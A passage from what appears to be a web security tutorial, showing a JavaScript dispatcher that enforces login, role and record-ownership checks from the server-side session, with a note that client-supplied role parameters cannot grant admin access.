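    handler: (session, params) => ({ user: params.user, last4: '1234' }),
  },
};

// `session` comes from the server's session store (or null when not logged
// in); `params` is whatever the client sent and is never used for identity.
// Anything not explicitly permitted is refused, and an unknown path is simply
// not served, so moving an endpoint to a "hidden" path buys nothing.
function dispatch(path, params, session) {
  const endpoint = ENDPOINTS[path];
  const p = params || {};
  if (!endpoint) return { status: 404 };                                   // no such function
  if (!session) return { status: 401 };                                    // not logged in
  if (!endpoint.allow.includes(session.role)) return { status: 403 };      // wrong role
  if (endpoint.owns && session.role !== 'admin' && !endpoint.owns(session, p)) {
    return { status: 403 };                                                // someone else's record
  }
  return { status: 200, body: endpoint.handler(session, p) };
}
```

The third test below is the one that matters most for an Ajaxified site: a request that says role=admin in its parameters still gets 403, because the role is read from the server-side session and not from anything the page’s JavaScript (or an attacker replaying it) chose to send.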